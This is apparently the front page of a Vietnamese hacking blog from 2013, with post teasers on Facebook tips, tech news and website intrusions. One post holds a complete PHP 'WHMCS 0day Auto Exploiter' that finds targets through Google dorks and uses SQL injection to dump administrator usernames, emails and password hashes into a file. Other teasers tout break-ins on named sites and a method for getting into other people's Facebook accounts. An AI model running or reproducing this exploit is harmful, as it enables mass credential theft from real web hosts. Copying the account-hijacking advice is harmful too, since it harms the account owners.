How to bypass age restriction on Youtube?

By: MIN Software on: 12:04 AM

Sunday, October 20, 2013

Có đứa bạn nhờ check site này: http://clanwong.com/

Mã nguồn thì IPB, mà mình thì chưa chơi với mã nguồn này bao giờ cả =.=

Sau khi tìm đủ các dork trên Google để kiếm exp thì ngán. Quay sang phương án Local.

Let's go!


ĐỌC TIẾP »

How to check Clanwong.com?

By: MIN Software on: 9:06 AM
http://www.whmcs.com/images/logos/logoblue.png

<?php
/*
*****************************************************
WHMCS 0day Auto Exploiter <= 5.2.8
Coded by g00n - Skype: t3hg00n
wwww.xploiter.net
*****************************************************
Preview:
http://i.imgur.com/qB726Gm.png
In action:
http://i.imgur.com/oNpZAf6.png
http://i.imgur.com/gFlBjtD.png
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}

function google_that($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter - by g00n</title>
</head>
<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : dashed 1px;
border-color : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}

#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
<style>
body {
font-family: 'Audiowide', serif;
font-size: 30px;

}
</style>
</head>

<body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
<center>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
</font>
<br><br>

<table border=1 bordercolor=red>
<tr>
<td width="700">
<br />
<center>
<form method="post">
Google Dork:   
<input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  <input type="submit" value="Xploit!" id="button"/>
</form>
<?php
if(isset($_POST['dork']{0})) {
$file = fopen("WMCS-Hashes.txt","a");
echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
letItBy();
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($_POST['dork'], $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';
fclose($file);
break;
}

for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = check_vuln($googleResult[$victim]['unescapedUrl']);
$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
if($result != "Fail!") {
$hashes = "";
foreach ($result as $record) {
$hashes = $hashes . str_replace(':::::','',$record) . "\n";
}
$sep = "========================================================\n";
$data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
fwrite($file,$data);
echo "<br /><font color=\"green\">Successfully Xploited...</font>";
echo '<span class="Y">';
echo "<pre>" . $data . "</pre></span><br />";

}
else {
echo '<span class="X">';
echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
echo "</span>\n<br />";
}
letItBy();
}
}
echo '</div>';
}
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="red" size="2">
Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
<br > <font color="green">For more tools/scripts/exploits/etc.</font>
<br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
</font>

</center>
</body>
</html>

Source: http://pastebin.com/cuikqkhA

[PHP] WHMCS 0-day Auto Exploiter <= 5.2.8

By: MIN Software on: 8:32 AM
http://i1.wp.com/symbian-developers.net/wp-content/uploads/hacking.jpeg

Victim:
Bknic.hut.edu.vn
Download Tutorial:
http://www.mediafire.com/download/a980t2g18ri3cov/bachkhoa.rar
Tutorial by Mr.P1n3.

[Mr.P1n3] How I checked bknic.hut.edu.vn?

By: MIN Software on: 8:21 AM
Ngày 15/01/2013 vừa qua HVA đã tổ chức thành công chương trình hội thảo An toàn thông tin thường niên Tetcon 2013.

Hội thảo Tetcon năm nay thành công rực rỡ là vì có sự đóng góp rất lớn từ những bài tham luận vô cùng tuyệt vời của các diễn giả có nhiều năm kinh nghiệm trong ngành An toàn thông tin.

Nhằm giúp các thành viên HVA yêu thích An toàn thông tin nhưng không có cơ hội tham gia coi trực tiếp và trao đổi trực tiếp với các diễn giả tuyệt vời của Tetcon 2013 có thể tham khảo một phần của các bài tham luận này. HVA News trân trọng cung cấp video clip quay lại các bài tham luận của Tetcon 2013.

ĐỌC TIẾP »

Hội thảo Tetcon 2013 Video Clip

By: MIN Software on: 4:42 AM

Saturday, October 19, 2013


Trong mấy ngày gần đây đang có trao phong trào đăng status với nút Reply, tính năng trả lời theo từng bình luận này tất nhiên không còn xa lạ gì với những bạn nào làm admin tại các Fan Page, nhưng đối với một tài khoản Facebook cá nhân thì sẽ gây sự chú ý đúng không nào!
ĐỌC TIẾP »

Hướng dẫn đăng status có reply (trả lời theo từng bình luận) trên Facebook

By: MIN Software on: 10:23 AM
Những triệu chứng chỉ xuất hiện trong kỷ nguyên công nghệ là mặt trái của sự hiện đại và Internet đối với đời sống của con người.
Công nghệ hiện đại thực sự đã thay đổi cuộc sống của chúng ta bằng cách mang lại những trải nghiệm mới mẻ, tiện ích và nhanh hơn. Thế nhưng, không có điều gì là hoàn hảo, mặc dù lợi ích đã lấn át đi một số điểm trừ mang lại, công nghệ cũng đã khai sinh ra không ít những “căn bệnh” mà con người có thể đang mắc phải mà không hề hay biết.

ĐỌC TIẾP »

Những "căn bệnh" con người có thể mắc phải từ công nghệ

By: MIN Software on: 2:29 AM

Wednesday, October 16, 2013

Khi sáng lập mạng xã hội Facebook, Mark Zuckerberg đã rất thành công khi đưa vào nút like để thăm dò thái độ tiếp cận của dân cư mạng. Tuy nhiên, hành xử như thế nào để được “like”.

Nếu như sự vĩ đại của Bill Gates ở chỗ ông dự đoán được tương lai tất cả mọi người đều có máy tính, Steve Jobs thành danh với thương hiệu Apple, thì hiệu quả của Mark Zuckerberg đơn giản hơn rất nhiều: chỉ là một nút like!
ĐỌC TIẾP »

Những “con chuột” trên Facebook

By: MIN Software on: 8:29 AM

Monday, October 14, 2013

In December 2012, Facebook announced a slew of privacy changes, one of which - the axing of the "Who can look up my timeline by name" feature - annoyed privacy aficionados.

The feature controlled whether someone could be found by typing their name into the Facebook search bar.
The setting was limited in scope and didn't keep people from being found in other ways across the site, Facebook said at the time.

Facebook yanked the setting last year for people who weren't using it.
For the minority of users still using the setting, the plug is now being pulled.

ĐỌC TIẾP »

Facebook's "Who can look up your timeline by name" privacy tool bites the dust

By: MIN Software on: 8:03 AM

Wednesday, October 9, 2013

http://wvu.acm.org/wp-content/uploads/2011/11/install_QCubed.jpg
Chào các bạn!
Trong bài viết này mình sẽ hướng dẫn các bạn tạo một file cài đặt đơn giản sử dụng chức năng tạo file nén tự bung của WinRAR. Qua bài viết này, các bạn có thể tự tạo một file cài đặt đối với những chương trình nhỏ hoặc đóng gói một phần mềm Portable chẳng hạn ^^

ĐỌC TIẾP »

Hướng dẫn tạo file cài đặt đơn giản với WinRAR

By: MIN Software on: 10:38 AM

Tuesday, October 8, 2013


Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.
(Credit: Microsoft
 
In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.

ĐỌC TIẾP »

Microsoft finally fixes critical Internet Explorer vulnerability

By: MIN Software on: 11:17 PM

Bạn có bao giờ tự nhìn lại mình rằng bạn đang dùng Facebook như thể một đứa trẻ hét lên "Có ai quan tâm tới tôi không?"


ĐỌC TIẾP »

Có phải chúng ta đang sống như một đứa trẻ trên Facebook?

By: MIN Software on: 10:00 AM

MediaFire là một trang web chia sẻ dữ liệu miễn phí và không giới hạn, có trụ sở tại Harris County, Texas, Hoa Kỳ. Tất cả các thành viên đăng ký đều có thể sử dụng đầy đủ chức năng của MediaFire. Khi đăng kí một tài khoản (miễn phí) tại MediaFire, bạn sẽ có 50 GB để lưu trữ.

Trong bài viết này, mình sẽ hướng các bạn cách kiếm thêm dung lượng lưu trữ miễn phí.

ĐỌC TIẾP »

Hướng dẫn kiếm thêm dung lượng lưu trữ cho tài khoản MediaFire

By: MIN Software on: 7:59 AM
A group of pro-Palestinian hackers aligned with Anonymous has successfully hacked a range of websites including WhatsApp, AVG and Alexa.


KDMS Team Hacked Avira Website
The message appearing on the Avira website having been compromised by the pro-Palestinian Kdms Team of hackers. (Twitter)
 
Over the past 24 hours a group calling themselves Kdms Team has claimed responsibility for hacking six different websites, including the homepages of the hugely popular messaging service WhatsApp and the top free anti-virus provider AVG.

ĐỌC TIẾP »

WhatsApp, AVG and Alexa Hacked by Pro-Palestinian Kdms Team Hackers

By: MIN Software on: 6:37 AM

Sunday, October 6, 2013


Web Hosting software WHMCS vulnerable to SQL Injection

WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.
ĐỌC TIẾP »

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released

By: MIN Software on: 12:42 AM

Friday, October 4, 2013

HTML Web Programming and Designing

HTML (Hyper Text Markup Language) is the web Programming language the most most most useful and useable Web Programming language, Programmer, hacker, developer everyone need to learn HTML. HTML is the Source and Base of all Web Programming languages, If you don't know HTML then you can't learn any Web Programming lang. 
ĐỌC TIẾP »

[eBook] HTML and PHP Tutorials

By: MIN Software on: 12:04 PM
Google is the Proclaimed king among all search engines present on the internet. Among all the web based search engines, Google stands out because of its high speed and simplicity.
Unknown Google tricks
Everyone is familiar with the web applications provided by Google. Some of these are the Gmail, Google Drive, Google app store and a lot more. But little do people know about some very handy tricks that come along with this impeccable search engine.
ĐỌC TIẾP »

Top 10 Unknown Google tricks

By: MIN Software on: 11:23 AM
thu thuat google search

Thủ thuật cho Google thì rất nhiều nhưng ở đây mình xin chia sẻ một số thủ thuật mình hay áp dụng trong quá trình tìm kiếm content để anh em tham khảo.

1. Loại bỏ một từ

Bạn muốn tìm kiếm một cụm từ A, nhưng bạn không muốn hiển thị các kết quả có từ B hãy sử dụng dấu “-”
VD: marketing online -seo
Trong ví dụ bên trên mình tìm kiếm các bài viết liên quan đến marketing online, nhưng không muốn hiển thị các bài viết về SEO.
ĐỌC TIẾP »

Một số thủ thuật Google Search có thể bạn chưa biết

By: MIN Software on: 11:11 AM
In today world most of people using internet. Some of them having high speed internet connection also some peoples don't have high speed internet connection. Speed internet connections also may go slow sometimes. Its just because that your computer settings may have to be changed for the speed connection. We can able to speed up the internet connection by simply with help of command prompt. 

ĐỌC TIẾP »

How to Speed Up Internet using Command Prompt

By: MIN Software on: 10:43 AM

Facebook Updates Graph Search

Facebook Graph Search is more powerful than ever, has been updated to allow people to search in greater depth on Facebook.
Facebook expanded its Graph Search to include posts and status updates, which means everything you’ve been posting is way easier to find than ever before.

ĐỌC TIẾP »

Facebook Graph Search becomes more powerful than ever, Review your Privacy Settings again

By: MIN Software on: 8:03 AM

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

ĐỌC TIẾP »

Bypass Facebook Security Jacking Method

By: MIN Software on: 2:08 AM

Thursday, October 3, 2013

A Rootkit virus is a stealth type of malware that is designed to hide the existence of certain processes or programs on your computer from regular detection methods, so as to allow it or another malicious process privileged access to your computer. Sometimes a rootkit may even fool your antivirus software and avoid being detected. It is at such times, that you may need to take help of special Rootkit Remover or Removal Tools.

Rootkit Remover

Here is a list of a few Rootkit Removers, most of which we have already covered on this site.

ĐỌC TIẾP »

List of Free Rootkit Remover software for Windows

By: MIN Software on: 5:52 AM

Monday, September 30, 2013

Facebook là mạng xã hội lớn nhất hành tinh với hàng triệu người dùng trên khắp thế giới. Một vài người có nhiều hơn một tài khoản, nếu họ quyết định xóa những tài khoản không sử dụng và họ không biết làm thế nào để xóa tài khoản của họ. Nhưng việc đó là khá dễ dàng, hãy xem bài hướng dẫn sau!

ĐỌC TIẾP »

Làm sao để xóa tài khoản Facebook vĩnh viễn?

By: MIN Software on: 10:14 AM

Friday, September 27, 2013

http://laurelpapworth.com/wp-content/uploads/2009/02/bill-facebook-banned-640x241.jpg 

Trong video Tutorial lần này, mình sẽ hướng dẫn các bạn một mẹo nhỏ giúp cấm một thành viên bất kì trên Fan Page Facebook (Tất nhiên là áp dụng với những thành viên vi phạm nội qui Page, spam, câu like,...).

Cùng theo dõi nhé :)

ĐỌC TIẾP »

Hướng dẫn cấm vĩnh viễn tài khoản bất kì trên Fan Page Facebook

By: MIN Software on: 2:44 AM
Mới đây, mạng xã hội được nhiều người sử dụng nhất hành tinh, Facebook đã cập nhật tính năng cho phép người dùng có thể sửa status của chính họ. Để chỉnh sửa status đã đăng tải của mình, người dùng có thể click vào biểu tượng nhỏ ở góc phải, sau đó lựa chọn "Chỉnh Sửa Bài Viết".



ĐỌC TIẾP »

Facebook cho phép chỉnh sửa status đã đăng

By: MIN Software on: 12:44 AM

Wednesday, September 25, 2013



Lười gõ Notepad nên dùng Sub Title cho nhanh mà đỡ tăng thời gian clip vì type nhiều :D


Tutorial by Juno_okyo - J2TeaM - Juno_okyo's Blog.

[Tutorial] How I checked server 42.112.19.129?

By: MIN Software on: 1:00 PM

Monday, September 23, 2013

Nhiều người trong số chúng ta vẫn tin rằng, Internet là một công cụ hữu ích có vai trò thiết yếu trong đời sống loài người, từ những ngày đầu phát triển của Mạng toàn cầu (World Wide Web) cho tới nay, chúng ta không thể phủ nhận khả năng tiếp cận tri thức của mạng máy tính mang lại cho loài người.

Tuy nhiên, cũng có nhiều ý kiến cho rằng Internet có những ảnh hưởng tiêu cực đối với người sử dụng khi chúng ta quá phụ thuộc vào nó, giảm khả năng sáng tạo và hạn chế sự phát triển của bản thân.

Vậy Internet khiến chúng ta thay đổi như thế nào, nó có những hệ lụy gì đối với sự tiến bộ của loài người. Chúng ta hãy cùng tìm hiểu trong bài viết của Rob May – CEO và cũng là người đồng sáng lập Backupify, giải pháp lưu trữ và khôi phục dữ liệu trên nền tảng điện toán đám mây.

ĐỌC TIẾP »

Internet đang giết chết sự tiến bộ?

By: MIN Software on: 2:23 PM

Saturday, September 21, 2013

http://www.socialmediahound.com/wp-content/uploads/2012/02/facebook-page-hijacking.png

Bằng cách sử dụng những đoạn script Facebook Like Hijacking, attacker hoàn toàn có thể kiểm soát từng click của bạn. Lợi dụng những script này, việc chèn vào các ứng dụng nhằm câu like có thể khiến số like của page tăng nhanh chóng trong khi người dùng hoàn toàn không hay biết việc họ đã bị "ép like" ra sao.

ĐỌC TIẾP »

[Facebook] Cảnh báo ứng dụng câu Like bằng Hijacking

By: MIN Software on: 12:47 PM
Đây có thể nói là một bộ tut khổng lồ của REA dày 517 trang, bao gồm 25 crackme tuts và 113 crack soft tuts. Bộ tut này được xây dựng theo mục lục tiện cho việc tra cứu, tham khảo. Các bài viết rất tỉ mỉ, rõ ràng trong việc xác định điểm cần tìm để tiến hành crack cũng như phân tích các đoạn code Asm để từ đó tiến hành Keygen theo một ngôn ngữ lâp trình nào đó.

ĐỌC TIẾP »

[eBook] Bộ sách REA-cRaCkErTeAm Tutorials

By: MIN Software on: 5:15 AM

Friday, September 13, 2013


[IMG]


Thiết lập để nhận thông báo khi có thiết bị lạ xâm nhập, kích hoạt tính năng bảo mật hai lớp, chặn tài khoản quảng cáo, spam hay kiểm duyệt đường dẫn nguy hiểm sẽ giúp tài khoản Facebook an toàn hơn.
ĐỌC TIẾP »

[Tip Facebook] Những thiết lập cần biết trên Facebook

By: MIN Software on: 1:32 PM

Tuesday, September 10, 2013

It seems not a day goes by without someone on the internet asking me how they can “recover” a password for a Facebook account that they can no longer access.

Some of them are more honest, and admit that they want to crack the password for someone else’s Facebook account because of a feud, or to pull a practical joke, or to spy upon a boyfriend or girlfriend that they believe might be cheating on them.

Naturally, in any of these scenarios, I’m not going to help. Breaking into someone else’s Facebook account without their permission is illegal, and if you have *genuinely* lost access to your own Facebook account and cannot recover your password through the usual processes, the best people to turn to are Facebook’s support team.

ĐỌC TIẾP »

Facebook Password Finder tools claim to hack into accounts, but are actually worthless

By: MIN Software on: 7:58 AM

Monday, September 9, 2013


Chào các bạn!

Sau khi đọc thông tin về lỗ hổng bảo mật này tại đây thì mình đã tìm hiểu, đọc mã nguồn vBulletin và viết thử script khai thác. Làm luôn cái video cho các bạn dễ hình dung nhé. Công cụ khai thác sẽ được tích hợp vào Juno_okyo's Blog trong thời gian tới! :)

ĐỌC TIẾP »

[Video] vBulletin Install Auto Exploiter Modified Script

By: MIN Software on: 11:36 AM

Friday, September 6, 2013


 











vBulletin is a publishing suite that allows users to create and publish a variety of content, including: forums, blogs, and polls. 
If you currently use an older version of  vBulletin  on your website, you might be opening up your site to an attack as some serious security vulnerabilities, which allows hackers to access your hosting admin panel.
Two Indian Hackers, going by virtual name  Ne0-h4ck3r & Google-warri0r has developed an exploit of known  vBulletin  vulnerability, that can be used to add a user remotely to  vBulletin  customer panel with admin privileges. 

ĐỌC TIẾP »

Major vBulletin based websites are vulnerable to Hackers

By: MIN Software on: 9:49 PM
http://file.diendanbaclieu.net/hinh/2013/1/file-host-facebook-thang-2-2013.jpg 

Chào các bạn!

Mình là Juno_okyo, trong bài viết này mình sẽ hướng dẫn các bạn đăng nhập ẩn (Invisible). Chúng ta sẽ thực hiện thông qua Facebook Chat. Nếu chúng ta muốn biết bạn bè có online hay không thì thường chúng ta sẽ mở Facebook Chat và xem nick nào đang hiện chấm nhỏ màu xanh (biểu tượng online) đúng không ;).
ĐỌC TIẾP »

Hướng dẫn đăng nhập Ẩn trên Facebook

By: MIN Software on: 8:09 PM
http://img.giaoduc.net.vn/w500/Uploaded/buikhuong/2013_06_20/facebook.jpg 

Theo dõi vô thức là gì?

Vô thức là hành động mà không làm chủ bản thân. Bạn có thể hiểu ở đây là Theo dõi một cách bị động.
Khi mà trên Facebook xuất hiện quá nhiều những status dạng "lừa đảo, câu sub" thì nhiều khi bạn thấy trên News Feed của mình xuất hiện những status của những người mà bạn không hề quen biết, không có trong danh sách bạn bè, vào xem trang cá nhân thì thấy "Đang theo dõi" (Following). Nhưng thực sự thì bạn chưa từng quen biết thì chắc chắn bạn không nhấn Theo dõi đúng không?
ĐỌC TIẾP »

Hướng dẫn hủy theo dõi khi bị "Theo dõi vô thức" trên Facebook

By: MIN Software on: 5:45 PM

Monday, September 2, 2013

Các chàng chuyên viên vi tính (IT) thường rất chung tình. Có bao giờ bạn để ý thấy một anh chàng "ngồi đồng" bên chiếc máy tính cả ngày, hầu như không ra khỏi phòng? Đó đích thị là những "con rệp điện tử", yêu máy tính và điện thoại của mình vô cùng. Trong tư tưởng của một số bạn gái, đây là mẫu người yêu vô cùng lý tưởng.


ĐỌC TIẾP »

9 lý do nên yêu trai CNTT (IT)

By: MIN Software on: 6:41 PM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com